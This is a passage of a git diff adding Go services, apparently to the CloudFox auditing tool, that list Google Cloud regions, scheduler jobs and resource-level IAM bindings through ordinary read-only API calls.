+ info.PushOIDCAudience = sub.PushConfig.OidcToken.Audience + } + } + + // Dead letter policy + if sub.DeadLetterPolicy != nil { + info.DeadLetterTopic = extractName(sub.DeadLetterPolicy.DeadLetterTopic) + info.MaxDeliveryAttempts = sub.DeadLetterPolicy.MaxDeliveryAttempts + } + + // BigQuery config + if sub.BigqueryConfig != nil { + info.BigQueryTable = sub.BigqueryConfig.Table + } + + // Cloud Storage config + if sub.CloudStorageConfig != nil { + info.CloudStorageBucket = sub.CloudStorageConfig.Bucket + } + + return info +} + +// getTopicSubscriptionCount counts subscriptions for a topic +func (ps *PubSubService) getTopicSubscriptionCount(service *pubsub.Service, topicName string) (int, error) { + ctx := context.Background() + + resp, err := service.Projects.Topics.Subscriptions.List(topicName).Context(ctx).Do() + if err != nil { + return 0, err + } + + return len(resp.Subscriptions), nil +} + +// getTopicIAMPolicy retrieves the IAM policy for a topic +func (ps *PubSubService) getTopicIAMPolicy(service *pubsub.Service, topicName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Topics.GetIamPolicy(topicName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getSubscriptionIAMPolicy retrieves the IAM policy for a subscription +func (ps *PubSubService) getSubscriptionIAMPolicy(service *pubsub.Service, subscriptionName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Subscriptions.GetIamPolicy(subscriptionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings from a policy +func parseIAMBindings(policy *pubsub.Policy) []IAMBinding { + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/regionService/regionService.go b/gcp/services/regionService/regionService.go new file mode 100644 index 00000000..90ca8dc1 --- /dev/null +++ b/gcp/services/regionService/regionService.go @@ -0,0 +1,335 @@ +// Package regionservice provides a unified way to enumerate GCP regions and zones +// with automatic fallback when permissions are denied. +// +// Fallback order: +// 1. Try Compute Engine Regions.List API (requires compute.regions.list) +// 2. Fall back to public Google endpoint (no auth required) +// 3. Fall back to hardcoded common regions list +package regionservice + +import ( + "context" + "encoding/json" + "fmt" + "net/http" + "sort" + "strings" + "sync" + "time" + + "google.golang.org/api/compute/v1" +) + +// GCPCloudIPRangesURL is the public Google endpoint that lists all GCP regions +// This endpoint requires no authentication and is updated by Google +const GCPCloudIPRangesURL = "https://www.gstatic.com/ipranges/cloud.json" + +// RegionService provides methods to enumerate GCP regions and zones +type RegionService struct { + computeService *compute.Service + httpClient *http.Client +} + +// RegionInfo contains information about a GCP region +type RegionInfo struct { + Name string // Region name (e.g., "us-central1") + Zones []string // Available zones in this region + Status string // Region status (UP, DOWN, or unknown) +} + +// New creates a new RegionService +func New() *RegionService { + return &RegionService{ + httpClient: &http.Client{Timeout: 10 * time.Second}, + } +} + +// NewWithComputeService creates a RegionService with an existing compute service +func NewWithComputeService(svc *compute.Service) *RegionService { + return &RegionService{ + computeService: svc, + httpClient: &http.Client{Timeout: 10 * time.Second}, + } +} + +// GetRegions returns all GCP regions with automatic fallback +// Tries in order: Compute API -> Public endpoint -> Hardcoded list +func (s *RegionService) GetRegions(ctx context.Context, projectID string) ([]RegionInfo, error) { + // Try Compute Engine API first (most accurate, includes zones) + if projectID != "" { + regions, err := s.getRegionsFromComputeAPI(ctx, projectID) + if err == nil && len(regions) > 0 { + return regions, nil + } + // Log but continue to fallback + } + + // Fall back to public endpoint + regions, err := s.getRegionsFromPublicEndpoint() + if err == nil && len(regions) > 0 { + return regions, nil + } + + // Fall back to hardcoded list + return s.getHardcodedRegions(), nil +} + +// GetRegionNames returns just the region names (convenience method) +func (s *RegionService) GetRegionNames(ctx context.Context, projectID string) []string { + regions, _ := s.GetRegions(ctx, projectID) + names := make([]string, len(regions)) + for i, r := range regions { + names[i] = r.Name + } + return names +} + +// GetAllZones returns all zones across all regions +func (s *RegionService) GetAllZones(ctx context.Context, projectID string) []string { + regions, _ := s.GetRegions(ctx, projectID) + var zones []string + for _, r := range regions { + zones = append(zones, r.Zones...) + } + return zones +} + +// getRegionsFromComputeAPI tries to get regions from the Compute Engine API +func (s *RegionService) getRegionsFromComputeAPI(ctx context.Context, projectID string) ([]RegionInfo, error) { + svc := s.computeService + if svc == nil { + var err error + svc, err = compute.NewService(ctx) + if err != nil { + return nil, err + } + } + + resp, err := svc.Regions.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + regions := make([]RegionInfo, 0, len(resp.Items)) + for _, r := range resp.Items { + info := RegionInfo{ + Name: r.Name, + Status: r.Status, + Zones: make([]string, 0, len(r.Zones)), + } + for _, zoneURL := range r.Zones { + // Extract zone name from URL + parts := strings.Split(zoneURL, "/") + if len(parts) > 0 { + info.Zones = append(info.Zones, parts[len(parts)-1]) + } + } + regions = append(regions, info) + } + + return regions, nil +} + +// cloudIPRangesResponse represents the JSON structure from cloud.json +type cloudIPRangesResponse struct { + SyncToken string `json:"syncToken"` + CreationTime string `json:"creationTime"` + Prefixes []cloudPrefix `json:"prefixes"` +} + +type cloudPrefix struct { + IPv4Prefix string `json:"ipv4Prefix,omitempty"` + IPv6Prefix string `json:"ipv6Prefix,omitempty"` + Service string `json:"service"` + Scope string `json:"scope"` +} + +// getRegionsFromPublicEndpoint fetches regions from the public Google endpoint +func (s *RegionService) getRegionsFromPublicEndpoint() ([]RegionInfo, error) { + resp, err := s.httpClient.Get(GCPCloudIPRangesURL) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d", resp.StatusCode) + } + + var data cloudIPRangesResponse + if err := json.NewDecoder(resp.Body).Decode(&data); err != nil { + return nil, err + } + + // Extract unique regions + regionSet := make(map[string]bool) + for _, prefix := range data.Prefixes { + scope := prefix.Scope + if scope == "" || scope == "global" { + continue + } + if strings.Contains(scope, "-") && containsDigit(scope) { + regionSet[scope] = true + } + } + + // Convert to RegionInfo with generated zones + regions := make([]RegionInfo, 0, len(regionSet)) + for region := range regionSet { + info := RegionInfo{ + Name: region, + Status: "unknown", + Zones: generateZonesForRegion(region), + } + regions = append(regions, info) + } + + // Sort by name + sort.Slice(regions, func(i, j int) bool { + return regions[i].Name < regions[j].Name + }) + + return regions, nil +} + +// getHardcodedRegions returns a hardcoded list of common GCP regions +func (s *RegionService) getHardcodedRegions() []RegionInfo { + regions := make([]RegionInfo, len(commonGCPRegions)) + for i, name := range commonGCPRegions { + regions[i] = RegionInfo{ + Name: name, + Status: "unknown", + Zones: generateZonesForRegion(name), + } + } + return regions +} + +// generateZonesForRegion generates common zone names for a region +func generateZonesForRegion(region string) []string { + // Most regions have zones a, b, c; some have more + suffixes := []string{"a", "b", "c"} + zones := make([]string, len(suffixes)) + for i, suffix := range suffixes { + zones[i] = region + "-" + suffix + } + return zones +} + +// containsDigit checks if a string contains at least one digit +func containsDigit(s string) bool { + for _, c := range s { + if c >= '0' && c <= '9' { + return true + } + } + return false +} + +// commonGCPRegions is a hardcoded fallback list of common GCP regions +var commonGCPRegions = []string{ + "africa-south1", + "asia-east1", + "asia-east2", + "asia-northeast1", + "asia-northeast2", + "asia-northeast3", + "asia-south1", + "asia-south2", + "asia-southeast1", + "asia-southeast2", + "australia-southeast1", + "australia-southeast2", + "europe-central2", + "europe-north1", + "europe-southwest1", + "europe-west1", + "europe-west2", + "europe-west3", + "europe-west4", + "europe-west6", + "europe-west8", + "europe-west9", + "europe-west10", + "europe-west12", + "me-central1", + "me-central2", + "me-west1", + "northamerica-northeast1", + "northamerica-northeast2", + "southamerica-east1", + "southamerica-west1", + "us-central1", + "us-east1", + "us-east4", + "us-east5", + "us-south1", + "us-west1", + "us-west2", + "us-west3", + "us-west4", +} + +// ---- Cached singleton for convenience ---- + +var ( + defaultService *RegionService + defaultServiceOnce sync.Once + cachedRegions []RegionInfo + cachedRegionsMu sync.RWMutex + cacheTime time.Time + cacheTTL = 1 * time.Hour +) + +// GetDefaultService returns a singleton RegionService +func GetDefaultService() *RegionService { + defaultServiceOnce.Do(func() { + defaultService = New() + }) + return defaultService +} + +// GetCachedRegions returns cached regions, refreshing if stale +// This is the recommended function for most use cases +func GetCachedRegions(ctx context.Context, projectID string) []RegionInfo { + cachedRegionsMu.RLock() + if len(cachedRegions) > 0 && time.Since(cacheTime) < cacheTTL { + result := make([]RegionInfo, len(cachedRegions)) + copy(result, cachedRegions) + cachedRegionsMu.RUnlock() + return result + } + cachedRegionsMu.RUnlock() + + // Fetch fresh + svc := GetDefaultService() + regions, _ := svc.GetRegions(ctx, projectID) + + // Update cache + cachedRegionsMu.Lock() + cachedRegions = regions + cacheTime = time.Now() + cachedRegionsMu.Unlock() + + return regions +} + +// GetCachedRegionNames returns just region names from cache +func GetCachedRegionNames(ctx context.Context, projectID string) []string { + regions := GetCachedRegions(ctx, projectID) + names := make([]string, len(regions)) + for i, r := range regions { + names[i] = r.Name + } + return names +} + +// GetCachedZones returns all zones from cached regions +func GetCachedZones(ctx context.Context, projectID string) []string { + regions := GetCachedRegions(ctx, projectID) + var zones []string + for _, r := range regions { + zones = append(zones, r.Zones...) + } + return zones +} diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go new file mode 100644 index 00000000..0885b3e7 --- /dev/null +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -0,0 +1,672 @@ +package resourceiamservice + +import ( + "context" + "fmt" + "strings" + + "cloud.google.com/go/bigquery" + "cloud.google.com/go/kms/apiv1" + "cloud.google.com/go/kms/apiv1/kmspb" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/storage" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" +) + +// ResourceIAMService handles enumeration of resource-level IAM policies +type ResourceIAMService struct { + session *gcpinternal.SafeSession +} + +// New creates a new ResourceIAMService +func New() *ResourceIAMService { + return &ResourceIAMService{} +} + +// NewWithSession creates a ResourceIAMService with a SafeSession +func NewWithSession(session *gcpinternal.SafeSession) *ResourceIAMService { + return &ResourceIAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *ResourceIAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// getSecretManagerService returns a cached Secret Manager service +func (s *ResourceIAMService) getSecretManagerService(ctx context.Context) (*secretmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerService(ctx, s.session) + } + return secretmanager.NewService(ctx) +} + +// getCloudFunctionsService returns a cached Cloud Functions service (v1) +func (s *ResourceIAMService) getCloudFunctionsService(ctx context.Context) (*cloudfunctions.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudFunctionsService(ctx, s.session) + } + return cloudfunctions.NewService(ctx) +} + +// getCloudRunService returns a cached Cloud Run service +func (s *ResourceIAMService) getCloudRunService(ctx context.Context) (*run.APIService, error) { + if s.session != nil { + return sdk.CachedGetCloudRunService(ctx, s.session) + } + return run.NewService(ctx) +} + +// ResourceIAMBinding represents an IAM binding on a specific resource +type ResourceIAMBinding struct { + ResourceType string `json:"resourceType"` // bucket, dataset, topic, secret, etc. + ResourceName string `json:"resourceName"` // Full resource name + ResourceID string `json:"resourceId"` // Short identifier + ProjectID string `json:"projectId"` + Role string `json:"role"` + Member string `json:"member"` + MemberType string `json:"memberType"` // user, serviceAccount, group, allUsers, allAuthenticatedUsers + MemberEmail string `json:"memberEmail"` + IsPublic bool `json:"isPublic"` // allUsers or allAuthenticatedUsers + HasCondition bool `json:"hasCondition"` + ConditionTitle string `json:"conditionTitle"` + ConditionExpression string `json:"conditionExpression"` // Full CEL expression +} + +// GetAllResourceIAM enumerates IAM policies across all supported resource types +func (s *ResourceIAMService) GetAllResourceIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var allBindings []ResourceIAMBinding + + // Get bucket IAM + bucketBindings, err := s.GetBucketIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bucketBindings...) + } + + // Get BigQuery dataset IAM + bqBindings, err := s.GetBigQueryDatasetIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bqBindings...) + } + + // Get Pub/Sub topic IAM + pubsubBindings, err := s.GetPubSubIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, pubsubBindings...) + } + + // Get Secret Manager IAM + secretBindings, err := s.GetSecretManagerIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, secretBindings...) + } + + // Get KMS IAM + kmsBindings, err := s.GetKMSIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, kmsBindings...) + } + + // Get Cloud Functions IAM + functionBindings, err := s.GetCloudFunctionsIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, functionBindings...) + } + + // Get Cloud Run IAM + runBindings, err := s.GetCloudRunIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, runBindings...) + } + + return allBindings, nil +} + +// GetBucketIAM enumerates IAM policies on Cloud Storage buckets +func (s *ResourceIAMService) GetBucketIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *storage.Client + var err error + if s.session != nil { + client, err = storage.NewClient(ctx, s.getClientOption()) + } else { + client, err = storage.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + defer client.Close() + + // List buckets + it := client.Buckets(ctx, projectID) + for { + bucketAttrs, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this bucket + bucket := client.Bucket(bucketAttrs.Name) + policy, err := bucket.IAM().Policy(ctx) + if err != nil { + continue + } + + // Convert policy to bindings + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "bucket", + ResourceName: fmt.Sprintf("gs://%s", bucketAttrs.Name), + ResourceID: bucketAttrs.Name, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetBigQueryDatasetIAM enumerates IAM policies on BigQuery datasets +func (s *ResourceIAMService) GetBigQueryDatasetIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *bigquery.Client + var err error + if s.session != nil { + client, err = bigquery.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + defer client.Close() + + // List datasets + it := client.Datasets(ctx) + for { + dataset, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get metadata which includes access entries (IAM-like) + meta, err := dataset.Metadata(ctx) + if err != nil { + continue + } + + // BigQuery uses Access entries instead of IAM policies + for _, access := range meta.Access { + member := access.Entity + entityTypeStr := fmt.Sprintf("%v", access.EntityType) + + // Determine member type and if public based on entity type + isPublic := false + memberType := entityTypeStr + + switch access.EntityType { + case bigquery.UserEmailEntity: + memberType = "User" + member = "user:" + access.Entity + case bigquery.GroupEmailEntity: + memberType = "Group" + member = "group:" + access.Entity + case bigquery.DomainEntity: + memberType = "Domain" + member = "domain:" + access.Entity + case bigquery.SpecialGroupEntity: + // Special groups include allAuthenticatedUsers + if access.Entity == "allAuthenticatedUsers" { + memberType = "allAuthenticatedUsers" + member = "allAuthenticatedUsers" + isPublic = true + } else { + memberType = "SpecialGroup" + } + case bigquery.IAMMemberEntity: + memberType = determineMemberType(access.Entity) + isPublic = isPublicMember(access.Entity) + } + + if member == "" { + continue + } + + binding := ResourceIAMBinding{ + ResourceType: "dataset", + ResourceName: fmt.Sprintf("%s.%s", projectID, dataset.DatasetID), + ResourceID: dataset.DatasetID, + ProjectID: projectID, + Role: string(access.Role), + Member: member, + MemberType: memberType, + MemberEmail: extractEmail(member), + IsPublic: isPublic, + } + bindings = append(bindings, binding) + } + } + + return bindings, nil +} + +// GetPubSubIAM enumerates IAM policies on Pub/Sub topics and subscriptions +func (s *ResourceIAMService) GetPubSubIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *pubsub.Client + var err error + if s.session != nil { + client, err = pubsub.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = pubsub.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + defer client.Close() + + // List topics + topicIt := client.Topics(ctx) + for { + topic, err := topicIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this topic + policy, err := topic.IAM().Policy(ctx) + if err != nil { + continue + } + + topicID := topic.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "topic", + ResourceName: fmt.Sprintf("projects/%s/topics/%s", projectID, topicID), + ResourceID: topicID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + // List subscriptions + subIt := client.Subscriptions(ctx) + for { + sub, err := subIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this subscription + policy, err := sub.IAM().Policy(ctx) + if err != nil { + continue + } + + subID := sub.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "subscription", + ResourceName: fmt.Sprintf("projects/%s/subscriptions/%s", projectID, subID), + ResourceID: subID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetSecretManagerIAM enumerates IAM policies on Secret Manager secrets +func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + smService, err := s.getSecretManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + // List secrets (with pagination) + parent := fmt.Sprintf("projects/%s", projectID) + pageToken := "" + var allSecrets []*secretmanager.Secret + for { + call := smService.Projects.Secrets.List(parent).Context(ctx) + if pageToken != "" { + call = call.PageToken(pageToken) + } + resp, err := call.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + allSecrets = append(allSecrets, resp.Secrets...) + if resp.NextPageToken == "" { + break + } + pageToken = resp.NextPageToken + } + + for _, secret := range allSecrets { + // Get IAM policy for this secret + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Context(ctx).Do() + if err != nil { + continue + } + + secretID := extractSecretID(secret.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "secret", + ResourceName: secret.Name, + ResourceID: secretID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetKMSIAM enumerates IAM policies on KMS keys +func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *kms.KeyManagementClient + var err error + if s.session != nil { + client, err = kms.NewKeyManagementClient(ctx, s.getClientOption()) + } else { + client, err = kms.NewKeyManagementClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + defer client.Close() + + // Get regions from regionService (with automatic fallback) plus global and multi-region locations + regions := regionservice.GetCachedRegionNames(ctx, projectID) + // Add global and multi-region locations that KMS supports + locations := append([]string{"global", "us", "eu", "asia"}, regions...) + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + + keyRingIt := client.ListKeyRings(ctx, &kmspb.ListKeyRingsRequest{Parent: parent}) + for { + keyRing, err := keyRingIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // List keys in this key ring + keyIt := client.ListCryptoKeys(ctx, &kmspb.ListCryptoKeysRequest{Parent: keyRing.Name}) + for { + key, err := keyIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this key + policy, err := client.ResourceIAM(key.Name).Policy(ctx) + if err != nil { + continue + } + + keyID := extractKeyID(key.Name) + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "cryptoKey", + ResourceName: key.Name, + ResourceID: keyID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + } + } + + return bindings, nil +} + +// GetCloudFunctionsIAM enumerates IAM policies on Cloud Functions +func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + cfService, err := s.getCloudFunctionsService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := cfService.Projects.Locations.Functions.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + for _, fn := range resp.Functions { + // Get IAM policy for this function + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Context(ctx).Do() + if err != nil { + continue + } + + fnID := extractFunctionID(fn.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "function", + ResourceName: fn.Name, + ResourceID: fnID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetCloudRunIAM enumerates IAM policies on Cloud Run services +func (s *ResourceIAMService) GetCloudRunIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + runService, err := s.getCloudRunService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + for _, svc := range resp.Items { + // Get IAM policy for this service + policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Context(ctx).Do() + if err != nil { + continue + } + + svcID := svc.Metadata.Name + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "cloudrun", + ResourceName: svc.Metadata.Name, + ResourceID: svcID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// Helper functions + +func determineMemberType(member string) string { + switch { + case member == "allUsers": + return "allUsers" + case member == "allAuthenticatedUsers": + return "allAuthenticatedUsers" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "principal:"): + return "Federated" + case strings.HasPrefix(member, "principalSet:"): + return "FederatedSet" + default: + return "Unknown" + } +} + +func extractEmail(member string) string { + if strings.Contains(member, ":") { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + } + return member +} + +func isPublicMember(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +func extractSecretID(name string) string { + // Format: projects/{project}/secrets/{secret} + parts := strings.Split(name, "/") + if len(parts) >= 4 { + return parts[len(parts)-1] + } + return name +} + +func extractKeyID(name string) string { + // Format: projects/{project}/locations/{location}/keyRings/{keyring}/cryptoKeys/{key} + parts := strings.Split(name, "/") + if len(parts) >= 8 { + return parts[len(parts)-1] + } + return name +} + +func extractFunctionID(name string) string { + // Format: projects/{project}/locations/{location}/functions/{function} + parts := strings.Split(name, "/") + if len(parts) >= 6 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go new file mode 100644 index 00000000..d9355e96 --- /dev/null +++ b/gcp/services/schedulerService/schedulerService.go @@ -0,0 +1,220 @@ +package schedulerservice + +import ( + "context" + "fmt" + "strings" + "sync" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + scheduler "google.golang.org/api/cloudscheduler/v1" +) + +type SchedulerService struct{ + session *gcpinternal.SafeSession +} + +func New() *SchedulerService { + return &SchedulerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SchedulerService { + return &SchedulerService{ + session: session, + } +} + +// JobInfo holds Cloud Scheduler job details with security-relevant information +type JobInfo struct { + Name string + ProjectID string + Location string + Description string + State string // ENABLED, PAUSED, DISABLED, UPDATE_FAILED + Schedule string // Cron expression + TimeZone string + + // Target configuration + TargetType string // http, pubsub, appengine + TargetURI string // For HTTP targets + TargetHTTPMethod string // For HTTP targets + TargetTopic string // For Pub/Sub targets + TargetService string // For App Engine targets + TargetVersion string // For App Engine targets + + // Authentication + ServiceAccount string // OIDC or OAuth service account + AuthType string // OIDC, OAuth, or none + + // Retry configuration + RetryCount int64 + MaxRetryDuration string + MaxBackoff string + + // Timing + LastAttemptTime string + ScheduleTime string + Status string // Last attempt status +} + +// getService returns a Cloud Scheduler service client using cached session if available +func (ss *SchedulerService) getService(ctx context.Context) (*scheduler.Service, error) { + if ss.session != nil { + return sdk.CachedGetSchedulerService(ctx, ss.session) + } + return scheduler.NewService(ctx) +} + +// Jobs retrieves all Cloud Scheduler jobs in a project across all regions +// Note: The Cloud Scheduler API does NOT support the "-" wildcard for locations +// so we must iterate through regions explicitly +func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := ss.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + } + + var jobs []JobInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // Iterate through all Scheduler regions in parallel + for _, region := range regions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + + call := service.Projects.Locations.Jobs.List(parent) + err := call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + mu.Lock() + jobs = append(jobs, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have jobs or API may not be enabled + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } + + wg.Wait() + + // Only return error if we got no jobs AND had errors + // If we found jobs in some regions, that's success + if len(jobs) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "cloudscheduler.googleapis.com") + } + + return jobs, nil +} + +// parseJobInfo extracts relevant information from a Cloud Scheduler job +func parseJobInfo(job *scheduler.Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Description: job.Description, + State: job.State, + Schedule: job.Schedule, + TimeZone: job.TimeZone, + } + + // Extract location from job name + // Format: projects/{project}/locations/{location}/jobs/{name} + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + // Parse target configuration + if job.HttpTarget != nil { + info.TargetType = "http" + info.TargetURI = job.HttpTarget.Uri + info.TargetHTTPMethod = job.HttpTarget.HttpMethod + + // Check for OIDC token + if job.HttpTarget.OidcToken != nil { + info.AuthType = "OIDC" + info.ServiceAccount = job.HttpTarget.OidcToken.ServiceAccountEmail + } + + // Check for OAuth token + if job.HttpTarget.OauthToken != nil { + info.AuthType = "OAuth" + info.ServiceAccount = job.HttpTarget.OauthToken.ServiceAccountEmail + } + } + + if job.PubsubTarget != nil { + info.TargetType = "pubsub" + info.TargetTopic = extractName(job.PubsubTarget.TopicName) 